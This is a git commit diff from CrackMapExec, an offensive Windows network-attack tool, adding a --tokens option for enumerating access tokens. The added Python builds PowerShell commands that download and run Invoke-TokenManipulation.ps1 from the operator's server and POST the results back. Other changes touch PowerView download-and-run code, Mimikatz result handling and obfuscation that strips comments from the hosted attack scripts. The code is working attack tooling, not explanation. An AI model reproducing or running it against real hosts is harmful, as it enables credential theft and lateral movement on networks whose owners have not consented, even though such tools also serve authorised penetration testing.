Added the --tokens options to enumerate available tokens (issue #86)

byt3bl33d3r · byt3bl33d3r · commit 4c3ca3a0f66c · 2016-03-12T18:24:08.000-07:00
Re-added Empire's function to strip powershell comments
Changed the PowerView PS script to the actual supported one
diff --git a/core/greenlets.py b/core/greenlets.py
@@ -307,6 +307,19 @@ def main_greenlet(host):
                          passwd,
                          ntlm_hash)
 
+            if settings.args.tokens:
+                powah_command = PowerShell(settings.args.server, local_ip)
+                EXECUTOR(cme_logger, 
+                         powah_command.token_enum(), 
+                         host, 
+                         domain, 
+                         True, 
+                         connection, 
+                         settings.args.execm,
+                         user,
+                         passwd,
+                         ntlm_hash)
+
             if settings.args.inject:
                 powah_command = PowerShell(settings.args.server, local_ip)
                 if settings.args.inject.startswith('met_'):
diff --git a/core/powershell.py b/core/powershell.py
@@ -81,7 +81,7 @@ def gpp_passwords(self):
     def powerview(self, command):
 
         command = """
-        IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/powerview.ps1');
+        IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/PowerView.ps1');
         $output = {view_command} | Out-String;
         $request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/');
         $request.Method = 'POST';
@@ -101,6 +101,29 @@ def powerview(self, command):
         else:
             return ps_command(command, int(self.arch))
 
+    def token_enum(self):
+
+        command = """
+        IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-TokenManipulation.ps1');
+        $output = Invoke-{func_name} -Enumerate | Out-String;
+        $request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/');
+        $request.Method = 'POST';
+        $request.ContentType = 'application/x-www-form-urlencoded';
+        $bytes = [System.Text.Encoding]::ASCII.GetBytes($output);
+        $request.ContentLength = $bytes.Length;
+        $requestStream = $request.GetRequestStream();
+        $requestStream.Write( $bytes, 0, $bytes.Length );
+        $requestStream.Close();
+        $request.GetResponse();""".format(protocol=self.protocol,
+                                          func_name=self.func_name,
+                                          port=settings.args.server_port,
+                                          addr=self.localip)
+
+        if self.arch == 'auto':
+            return ps_command(command, 64)
+        else:
+            return ps_command(command, int(self.arch))
+
     def inject_meterpreter(self):
         #PowerSploit's 3.0 update removed the Meterpreter injection options in Invoke-Shellcode
         #so now we have to manually generate a valid Meterpreter request URL and download + exec the staged shellcode
diff --git a/core/servers/mimikatz.py b/core/servers/mimikatz.py
@@ -11,8 +11,6 @@
 import ssl
 
 func_name = re.compile('CHANGE_ME_HERE')
-comments  = re.compile('#.+')
-synopsis  = re.compile('<#.+#>')
 
 class MimikatzServer(BaseHTTPRequestHandler):
 
@@ -26,6 +24,17 @@ def save_mimikatz_output(self, data, cme_logger):
             creds.write(data)
         cme_logger.info("Saved Mimikatz's output to {}".format(log_name))
 
+    def strip_powershell_comments(self, data):
+     """
+     Strip block comments, line comments, empty lines, verbose statements,
+     and debug statements from a PowerShell source file.
+     """
+     # strip block comments
+     strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '', data)
+     # strip blank lines, lines starting with #, and verbose/debug statements
+     strippedCode = "\n".join([line for line in strippedCode.split('\n') if ((line.strip() != '') and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")) )])
+     return strippedCode
+
     def do_GET(self):
         if self.path[1:].endswith('.ps1') and self.path[1:] in os.listdir('hosted'):
             self.send_response(200)
@@ -34,9 +43,8 @@ def do_GET(self):
                 ps_script = script.read()
                 if self.path[1:] != 'powerview.ps1':
                     logging.info('Obfuscating Powershell script')
-                    ps_script = eval(synopsis.sub('', repr(ps_script))) #Removes the synopsys
                     ps_script = func_name.sub(settings.obfs_func_name, ps_script) #Randomizes the function name
-                    ps_script = comments.sub('', ps_script) #Removes the comments
+                    ps_script = self.strip_powershell_comments(ps_script)
                     #logging.info('Sending the following modified powershell script: {}'.format(ps_script))
                 self.wfile.write(ps_script)
 
@@ -102,6 +110,12 @@ def do_POST(self):
             for line in buf:
                 cme_logger.results(line.strip())
 
+        elif settings.args.tokens and data:
+            cme_logger.success('Retrieved avalible tokens:')
+            buf = StringIO(data.strip()).readlines()
+            for line in buf:
+                cme_logger.results(line.strip())
+
 def http_server(port):
     http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)
     t = Thread(name='http_server', target=http_server.serve_forever)
diff --git a/crackmapexec.py b/crackmapexec.py
@@ -91,6 +91,7 @@
 
 egroup = parser.add_argument_group("Mapping/Enumeration", "Options for Mapping/Enumerating")
 egroup.add_argument("--shares", action="store_true", dest="enum_shares", help="List shares")
+egroup.add_argument("--tokens", action='store_true', help="Enumerate available tokens")
 egroup.add_argument('--check-uac', action='store_true', dest='check_uac', help='Checks UAC status')
 egroup.add_argument("--sessions", action='store_true', dest='enum_sessions', help='Enumerate active sessions')
 egroup.add_argument('--disks', action='store_true', dest='enum_disks', help='Enumerate disks')
@@ -268,7 +269,7 @@ def populate_targets(target):
     else:
         populate_targets(target)
 
-if args.mimikatz or args.powerview or args.gpp_passwords or args.mimikatz_cmd or args.inject or args.ntds == 'ninja':
+if args.mimikatz or args.powerview or args.gpp_passwords or args.mimikatz_cmd or args.tokens or args.inject or args.ntds == 'ninja':
     if args.server == 'http':
         http_server(args.server_port)
 
@@ -290,7 +291,7 @@ def concurrency(targets):
 
 concurrency(targets)
 
-if args.mimikatz or args.powerview or args.gpp_passwords or args.mimikatz_cmd or args.inject or args.ntds == 'ninja':
+if args.mimikatz or args.powerview or args.gpp_passwords or args.mimikatz_cmd or args.tokens or args.inject or args.ntds == 'ninja':
     try:
         while True:
             sleep(1)
diff --git a/hosted/Invoke-TokenManipulation.ps1 b/hosted/Invoke-TokenManipulation.ps1
diff --git a/hosted/PowerView.ps1 b/hosted/PowerView.ps1
